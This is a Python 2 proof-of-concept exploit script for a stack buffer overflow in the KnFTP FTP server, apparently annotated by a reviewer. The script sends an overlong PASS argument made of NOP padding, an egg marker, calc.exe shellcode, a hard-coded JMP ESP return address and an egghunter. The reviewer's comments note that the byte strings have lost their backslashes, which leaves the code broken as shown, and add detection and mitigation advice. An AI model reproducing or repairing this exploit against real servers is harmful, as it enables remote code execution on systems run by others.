#!/usr/bin/python
# Proof-of-concept for a stack buffer overflow in the KnFTP server.
#
# What the script does (see the send() calls at the bottom): it logs in with
# a fixed USER name, then sends a PASS command whose argument is several
# hundred bytes long -- NOP padding, an egg marker, shellcode, a return
# address, more NOPs and an egghunter.  The header notes below are the
# original author's and describe the environment it was tested against.
#
# NOTE(review): as rendered on this page the byte strings below contain no
# backslashes ("xb8xe8..."), so each one evaluates to literal ASCII text,
# not the bytes the comments describe.  The listing is a historical record
# of the technique and is not runnable as shown.  It is also Python 2
# syntax (print statements, raw_input).
#
# NOTE(review): from the defender's side the observable on the wire is a
# PASS argument far longer than any legitimate password, consisting mostly
# of 0x90 bytes; server-side input-length validation on FTP command
# arguments is the mitigation, and logging/alerting on over-long command
# arguments is the obvious detection.
# tested on windows xp sp3
# overwrites EIP
# seh is overwritten with larger payloads
# knftpd.exe is the only non safeseh module
import sys,socket
print " ====================="
print "KnFTP Buffer Overflow"
print " Written by Blake "
print "===================== "
# Exactly two positional arguments are required: target address and port.
if len(sys.argv) !=3:
    print "[*] Usage: %s <ip> <port>" % sys.argv[0]
    sys.exit(0)
target = sys.argv[1]
# int() raises ValueError on a non-numeric port; that is not caught here.
port = int(sys.argv[2])
# 271 bytes of space for shellcode
# 227 bytes windows/exec CMD => calc.exe
# Per the author's comment this is a windows/exec payload that launches
# calc.exe, i.e. a harmless demonstration payload.
shellcode =(
"xb8xe8xaax5exc0xdbxd6xd9x74x24xf4x5bx31xc9xb1"
"x33x31x43x12x03x43x12x83x03x56xbcx35x2fx4fxc8"
"xb6xcfx90xabx3fx2axa1xf9x24x3fx90xcdx2fx6dx19"
"xa5x62x85xaaxcbxaaxaax1bx61x8dx85x9cx47x11x49"
"x5exc9xedx93xb3x29xcfx5cxc6x28x08x80x29x78xc1"
"xcfx98x6dx66x8dx20x8fxa8x9ax19xf7xcdx5cxedx4d"
"xcfx8cx5exd9x87x34xd4x85x37x45x39xd6x04x0cx36"
"x2dxfex8fx9ex7fxffxbexdex2cx3ex0fxd3x2dx06xb7"
"x0cx58x7cxc4xb1x5bx47xb7x6dxe9x5ax1fxe5x49xbf"
"x9ex2ax0fx34xacx87x5bx12xb0x16x8fx28xccx93x2e"
"xffx45xe7x14xdbx0exb3x35x7axeax12x49x9cx52xca"
"xefxd6x70x1fx89xb4x1exdex1bxc3x67xe0x23xccxc7"
"x89x12x47x88xcexaax82xedx21xe1x8fx47xaaxacx45"
"xdaxb7x4exb0x18xcexccx31xe0x35xccx33xe5x72x4a"
"xafx97xebx3fxcfx04x0bx6axacxcbx9fxf6x1dx6ex18"
"x9cx61")
# 32 byte egghunter
# The egghunter is placed after the overwritten return address; it scans
# memory for the "W00T" marker (egg) that precedes the shellcode.
egghunter =(
"x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8"
"x54x30x30x57" # egg - W00T
"x8bxfaxafx75xeaxafx75xe7xffxe7")
# The marker is doubled ("W00T" twice) so the hunter can tell the marker
# from its own copy of the search value.
egg = "x54x30x30x57x54x30x30x57"
# Pad so that egg + shellcode + padding fills the 271-byte region noted
# above; len() here counts the (mis-rendered) characters, not intended bytes.
buffer = "x90" * (271 - len(egg + shellcode))
eip = "x13x44x87x7c" # 7C874413 JMP ESP - kernel32.dll
# NOTE(review): this address is specific to the kernel32.dll build of the
# XP SP3 test system named in the header; any other build would differ.
nops = "x90" * 8
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[+] Connecting to %s on port %d" % (target,port)
try:
    s.connect((target,port))
    print "[+] Sending payload"
    # Server responses are read and discarded; nothing checks that the
    # USER command was actually accepted before PASS is sent.
    s.send("USER blake ")
    s.recv(1024)
    # Layout of the overflowing PASS argument:
    #   padding | egg | shellcode | eip | nops | egghunter
    s.send("PASS " + buffer + egg + shellcode + eip + nops + egghunter + " ")
    s.recv(1024)
    s.close()
    print "[+] Payload sent successfully"
    raw_input("[+] Press any key to exit ")
# NOTE(review): bare except catches everything raised inside the try,
# including send/recv errors and KeyboardInterrupt, and reports all of
# them as a connection failure; the socket is not closed on that path.
except:
    print "[+] Could not connect to %s!" % target
    sys.exit(0)
